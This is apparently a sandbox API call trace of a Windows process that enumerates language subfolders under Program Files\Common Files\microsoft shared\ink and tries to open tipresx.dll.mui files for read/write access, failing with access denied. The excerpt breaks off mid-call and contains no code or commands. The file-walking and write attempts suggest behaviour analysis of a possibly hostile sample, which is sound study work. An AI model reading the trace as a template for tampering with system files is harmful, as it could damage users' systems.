MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL") returned 57 [0099.744] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.744] GetLastError () returned 0x5 [0099.744] GetLastError () returned 0x5 [0099.744] SetLastError (dwErrCode=0x5) [0099.744] GetLastError () returned 0x5 [0099.744] SetLastError (dwErrCode=0x5) [0099.744] GetLastError () returned 0x5 [0099.744] SetLastError (dwErrCode=0x5) [0099.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0099.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0099.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5ef58 [0099.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0099.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0099.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ef58 | out: hHeap=0x20000) returned 1 [0099.744] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cfce2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0099.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0099.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0099.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0099.744] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78010 [0099.745] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf9a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.745] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0099.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0099.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.746] AreFileApisANSI () returned 1 [0099.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0099.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.746] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.746] AreFileApisANSI () returned 1 [0099.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x854e0 [0099.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui") returned 73 [0099.746] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.746] GetFileType (hFile=0x418) returned 0x1 [0099.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0099.746] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.746] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.747] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.747] CloseHandle (hObject=0x418) returned 1 [0099.747] AreFileApisANSI () returned 1 [0099.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x854e0 [0099.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui") returned 73 [0099.747] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.747] GetLastError () returned 0x5 [0099.747] GetLastError () returned 0x5 [0099.747] SetLastError (dwErrCode=0x5) [0099.747] GetLastError () returned 0x5 [0099.747] SetLastError (dwErrCode=0x5) [0099.747] GetLastError () returned 0x5 [0099.748] SetLastError (dwErrCode=0x5) [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.748] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8d180, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧☀")) returned 0 [0099.748] FindClose (in: hFindFile=0x78010 | out: hFindFile=0x78010) returned 1 [0099.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0099.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0099.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0099.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0099.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0099.749] AreFileApisANSI () returned 1 [0099.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR", lpUsedDefaultChar=0x0) returned 57 [0099.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.749] AreFileApisANSI () returned 1 [0099.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0099.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR") returned 57 [0099.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.749] GetLastError () returned 0x5 [0099.749] GetLastError () returned 0x5 [0099.749] SetLastError (dwErrCode=0x5) [0099.749] GetLastError () returned 0x5 [0099.749] SetLastError (dwErrCode=0x5) [0099.749] GetLastError () returned 0x5 [0099.749] SetLastError (dwErrCode=0x5) [0099.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0099.750] AreFileApisANSI () returned 1 [0099.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0099.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR") returned 57 [0099.750] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.750] GetLastError () returned 0x5 [0099.750] GetLastError () returned 0x5 [0099.750] SetLastError (dwErrCode=0x5) [0099.750] GetLastError () returned 0x5 [0099.750] SetLastError (dwErrCode=0x5) [0099.750] GetLastError () returned 0x5 [0099.750] SetLastError (dwErrCode=0x5) [0099.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0099.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.750] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0099.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0099.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0099.751] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06d0656, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0099.751] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78690 [0099.751] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cfce2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.751] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0099.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0099.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.751] RtlAllocateHeap (HeapHandle=0x20000, 